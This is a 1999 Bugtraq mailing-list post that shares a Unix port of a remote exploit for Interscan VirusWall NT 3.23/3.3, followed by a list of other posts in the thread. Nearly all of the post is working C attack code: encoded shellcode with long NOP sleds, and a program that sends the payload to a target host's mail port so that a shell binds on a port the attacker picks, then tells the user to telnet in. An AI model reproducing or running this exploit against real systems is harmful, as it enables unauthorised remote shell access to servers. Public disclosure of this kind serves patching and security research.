Bugtraq mailing list archives
vwxploit.c unix port
From: scut () NB IN-BERLIN DE (Sebastian)
Date: Mon, 8 Nov 1999 13:21:43 +0100
Hi:) This is just another unix port of dark spyrits excellent exploits :) keep on the good work ! :-) ciao, scut / team teso [http://teso.scene.at/] -- - scut () nb in-berlin de - http://nb.in-berlin.de/scut/ - - http://nb.in-berlin.de/scut/ - sacbuctd@ircnet -- -- you don't need a lot of people to be great, you need a few great to be -- -- the best ----------------------------------------------------------------- --- nuclear arrival weapon spy agent remain undercover, hi echelon ---------- /* Interscan VirusWall 3.23/3.3 remote * by dark spyrit <dspyrit () beavuh org> * quick unix port by team teso (http://teso.scene.at/). * * further information at http://www.beavuh.org. */ #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <errno.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <fcntl.h> #include <netdb.h> /* local functions */ void usage (void); unsigned long int net_resolve (char *host); int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, int sec); /* shellcode by dark spyrit */ unsigned long sploit_323_len = 1314; unsigned char sploit_323[] = "\x68\x65\x6c\x6f\x20\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\xbb\x10\x0b\x11\x01\xc1\xeb" "\x02\x8b\xf8\x33\xc0\x50\x48\x90\x50\x59\xf2\xaf" "\x59\xb1\xc6\x8b\xc7\x48\x80\x30\x99\xe2\xfa\x33" "\xf6\x96\x90\x90\x56\xff\x13\x8b\xd0\xfc\x33\xc9" "\xb1\x0b\x49\x32\xc0\xac\x84\xc0\x75\xf9\x52\x51" "\x56\x52\x66\xbb\x34\x43\xff\x13\xab\x59\x5a\xe2" "\xec\x32\xc0\xac\x84\xc0\x75\xf9\x66\xbb\xc4\x42" "\x56\xff\x13\x8b\xd0\xfc\x33\xc9\xb1\x06\x32\xc0" "\xac\x84\xc0\x75\xf9\x52\x51\x56\x52\x66\xbb\x34" "\x43\xff\x13\xab\x59\x5a\xe2\xec\x83\xc6\x05\x33" "\xc0\x50\x40\x50\x40\x50\xff\x57\xe8\x93\x6a\x10" "\x56\x53\xff\x57\xec\x6a\x02\x53\xff\x57\xf0\x33" "\xc0\x57\x50\xb0\x0c\xab\x58\xab\x40\xab\x5f\x48" "\x50\x57\x56\xad\x56\xff\x57\xc0\x48\x50\x57\xad" "\x56\xad\x56\xff\x57\xc0\x48\xb0\x44\x89\x07\x57" "\xff\x57\xc4\x33\xc0\x8b\x46\xf4\x89\x47\x3c\x89" "\x47\x40\x8b\x06\x89\x47\x38\x33\xc0\x66\xb8\x01" "\x01\x89\x47\x2c\x57\x57\x33\xc0\x50\x50\x50\x40" "\x50\x48\x50\x50\xad\x56\x33\xc0\x50\xff\x57\xc8" "\xff\x76\xf0\xff\x57\xcc\xff\x76\xfc\xff\x57\xcc" "\x48\x50\x50\x53\xff\x57\xf4\x8b\xd8\x33\xc0\xb4" "\x04\x50\xc1\xe8\x04\x50\xff\x57\xd4\x8b\xf0\x33" "\xc0\x8b\xc8\xb5\x04\x50\x50\x57\x51\x50\xff\x77" "\xa8\xff\x57\xd0\x83\x3f\x01\x7c\x22\x33\xc0\x50" "\x57\xff\x37\x56\xff\x77\xa8\xff\x57\xdc\x0b\xc0" "\x74\x2f\x33\xc0\x50\xff\x37\x56\x53\xff\x57\xf8" "\x6a\x50\xff\x57\xe0\xeb\xc8\x33\xc0\x50\xb4\x04" "\x50\x56\x53\xff\x57\xfc\x57\x33\xc9\x51\x50\x56" "\xff\x77\xac\xff\x57\xd8\x6a\x50\xff\x57\xe0\xeb" "\xaa\x50\xff\x57\xe4\x90\xd2\xdc\xcb\xd7\xdc\xd5" "\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9" "\xfc\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9" "\xd0\xf7\xff\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc" "\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xda\xf5\xf6" "\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc" "\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde" "\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce" "\xeb\xf0\xed\xfc\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8" "\xfd\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99" "\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99" "\xce\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2" "\xfc\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed" "\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xea\xfc" "\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\x9b\x99" "\xff\xff" /* 16 bit remote port number */ "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\xfa\xf4\xfd\xb7\xfc\xe1\xfc\x99\xff\xff\xff\xff" "\x60\x45\x42\x00\x0d\x0a"; unsigned long sploit_33_len = 794; unsigned char sploit_33[] = "\x68\x65\x6c\x6f\x20\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x4b\x8b" "\xc3\xbb\x01\x90\x16\x01\xc1\xeb\x02\x8b\xf8\x33" "\xc0\x50\x48\x90\x50\x59\xf2\xaf\x59\xb1\xc6\x8b" "\xc7\x48\x80\x30\x99\xe2\xfa\x33\xf6\x96\x90\x90" "\x56\xff\x13\x8b\xd0\xfc\x33\xc9\xb1\x0b\x49\x32" "\xc0\xac\x84\xc0\x75\xf9\x52\x51\x56\x52\xb3\x80" "\x90\x90\xff\x13\xab\x59\x5a\xe2\xec\x32\xc0\xac" "\x84\xc0\x75\xf9\xb3\x01\x4b\x90\x56\xff\x13\x8b" "\xd0\xfc\x33\xc9\xb1\x06\x32\xc0\xac\x84\xc0\x75" "\xf9\x52\x51\x56\x52\xb3\x80\x90\x90\xff\x13\xab" "\x59\x5a\xe2\xec\x83\xc6\x05\x33\xc0\x50\x40\x50" "\x40\x50\xff\x57\xe8\x93\x6a\x10\x56\x53\xff\x57" "\xec\x6a\x02\x53\xff\x57\xf0\x33\xc0\x57\x50\xb0" "\x0c\xab\x58\xab\x40\xab\x5f\x48\x50\x57\x56\xad" "\x56\xff\x57\xc0\x48\x50\x57\xad\x56\xad\x56\xff" "\x57\xc0\x48\xb0\x44\x89\x07\x57\xff\x57\xc4\x33" "\xc0\x8b\x46\xf4\x89\x47\x3c\x89\x47\x40\x8b\x06" "\x89\x47\x38\x33\xc0\x66\xb8\x01\x01\x89\x47\x2c" "\x57\x57\x33\xc0\x50\x50\x50\x40\x50\x48\x50\x50" "\xad\x56\x33\xc0\x50\xff\x57\xc8\xff\x76\xf0\xff" "\x57\xcc\xff\x76\xfc\xff\x57\xcc\x48\x50\x50\x53" "\xff\x57\xf4\x8b\xd8\x33\xc0\xb4\x04\x50\xc1\xe8" "\x04\x50\xff\x57\xd4\x8b\xf0\x33\xc0\x8b\xc8\xb5" "\x04\x50\x50\x57\x51\x50\xff\x77\xa8\xff\x57\xd0" "\x83\x3f\x01\x7c\x22\x33\xc0\x50\x57\xff\x37\x56" "\xff\x77\xa8\xff\x57\xdc\x0b\xc0\x74\x2f\x33\xc0" "\x50\xff\x37\x56\x53\xff\x57\xf8\x6a\x50\xff\x57" "\xe0\xeb\xc8\x33\xc0\x50\xb4\x04\x50\x56\x53\xff" "\x57\xfc\x57\x33\xc9\x51\x50\x56\xff\x77\xac\xff" "\x57\xd8\x6a\x50\xff\x57\xe0\xeb\xaa\x50\xff\x57" "\xe4\x90\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda" "\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99\xde\xfc" "\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff\xf6" "\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa" "\xfc\xea\xea\xd8\x99\xda\xf5\xf6\xea\xfc\xd1\xf8" "\xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4" "\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8" "\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce\xeb\xf0\xed\xfc" "\xdf\xf0\xf5\xfc\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5" "\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xdc\xe1\xf0\xed" "\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xce\xca\xd6\xda" "\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb" "\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8" "\xfa\xfa\xfc\xe9\xed\x99\xea\xfc\xf7\xfd\x99\xeb" "\xfc\xfa\xef\x99\x9b\x99" "\xff\xff" /* sploit port number */ "\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\xfa\xf4\xfd\xb7" "\xfc\xe1\xfc\x99\xff\xff\xff\xff\x09\x1f\x40\x00" "\x0d\x0ah"; void usage (void) { printf ("Interscan VirusWall NT 3.23/3.3 remote - http://www.beavuh.org for nfo.\n" "by dark spyrit <dspyrit () beavuh org>\n" "quick unix port by team teso\n\n" "usage: vwxploit <host> <port> <port to bind shell> <version>\n" "eg - vwxploit host.com 25 1234 3.23\n"); exit (EXIT_FAILURE); } int main (int argc, char **argv) { int socket; unsigned char *shellcode; unsigned char *sh_port_offset; char *server; unsigned short int port_dest, port_shell; size_t sh_len; struct sockaddr_in sa; if (argc != 5) usage (); server = argv[1]; port_dest = atoi (argv[2]); port_shell = atoi (argv[3]); if (port_dest == 0 || port_shell == 0) usage (); if (strcmp (argv[4], "3.23") == 0) { shellcode = sploit_323; sh_len = sploit_323_len; sh_port_offset = sploit_323 + 1282; } else if (strcmp (argv[4], "3.3") == 0) { shellcode = sploit_33; sh_len = sploit_33_len; sh_port_offset = sploit_33 + 762; } else { fprintf (stderr, "unsupported version\n"); exit (EXIT_FAILURE); } port_shell ^= 0x9999; *sh_port_offset = (char) ((port_shell >> 8) & 0xff); *(sh_port_offset + 1) = (char) (port_shell & 0xff); socket = net_connect (&sa, server, port_dest, 45); if (socket <= 0) { perror ("net_connect"); exit (EXIT_FAILURE); } write (socket, shellcode, sh_len); sleep (1); close (socket); printf ("data send, try \"telnet %s %d\" now\n", argv[1], atoi (argv[3])); exit (EXIT_SUCCESS); } unsigned long int net_resolve (char *host) { long i; struct hostent *he; i = inet_addr (host); if (i == -1) { he = gethostbyname (host); if (he == NULL) { return (0); } else { return (*(unsigned long *) he->h_addr); } } return (i); } int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, int sec) { int n, len, error, flags; int fd; struct timeval tv; fd_set rset, wset; /* first allocate a socket */ cs->sin_family = AF_INET; cs->sin_port = htons (port); fd = socket (cs->sin_family, SOCK_STREAM, 0); if (fd == -1) return (-1); cs->sin_addr.s_addr = net_resolve (server); if (cs->sin_addr.s_addr == 0) { close (fd); return (-1); } flags = fcntl (fd, F_GETFL, 0); if (flags == -1) { close (fd); return (-1); } n = fcntl (fd, F_SETFL, flags | O_NONBLOCK); if (n == -1) { close (fd); return (-1); } error = 0; n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in)); if (n < 0) { if (errno != EINPROGRESS) { close (fd); return (-1); } } if (n == 0) goto done; FD_ZERO(&rset); FD_ZERO(&wset); FD_SET(fd, &rset); FD_SET(fd, &wset); tv.tv_sec = sec; tv.tv_usec = 0; n = select(fd + 1, &rset, &wset, NULL, &tv); if (n == 0) { close(fd); errno = ETIMEDOUT; return (-1); } if (n == -1) return (-1); if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) { if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) { len = sizeof(error); if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) { errno = ETIMEDOUT; return (-1); } if (error == 0) { goto done; } else { errno = error; return (-1); } } } else return (-1); done: n = fcntl(fd, F_SETFL, flags); if (n == -1) return (-1); return (fd); }
Current thread:
- Guestbook.pl, sloppy SSI handling in Apache? (VD#2) Blue Boar (Nov 05)
- Re: Guestbook.pl, sloppy SSI handling in Apache? (VD#2) Marc Slemko (Nov 06)
- Re: Guestbook.pl, sloppy SSI handling in Apache? (VD#2) Ben Laurie (Nov 06)
- Re: Guestbook.pl, sloppy SSI handling in Apache? (VD#2) Stephen White (Nov 06)
- Re: Guestbook.pl, sloppy SSI handling in Apache? (VD#2) Steven Champeon (Nov 07)
- Patch for VirusWall 3.23. dark spyrit (Nov 07)
- Netscape Web Publisher Tim Jones (Nov 06)
- Re: Netscape Web Publisher Mnemonix (Nov 07)
- Re: Netscape Web Publisher nblasgen () NICK REFRACT COM (Nov 07)
- vwxploit.c unix port Sebastian (Nov 08)
- Windows NT Spooler Service. Avri Schneider (Nov 07)
- [w00giving '99 #2] IMAIL POP server Shok (Nov 07)
- Re: Guestbook.pl, sloppy SSI handling in Apache? (VD#2) Blue Boar (Nov 07)
- Re: Guestbook.pl, sloppy SSI handling in Apache? (VD#2) Jefferson Ogata (Nov 08)
- MS Outlook alert : Cuartango Active Setup Elias Levy (Nov 08)
- BigIP - bigconf.cgi holes Guy Cohen (Jun 13)
- Re: MS Outlook alert : Cuartango Active Setup David LeBlanc (Nov 08)
- Re: MS Outlook alert : Cuartango Active Setup - Workaround Instructions Mark (Nov 08)
- Insecure handling of NetSol maintainer passwords jlewis () LEWIS ORG (Nov 08)
- flaw in dmesg under Solaris echo8 (Nov 09)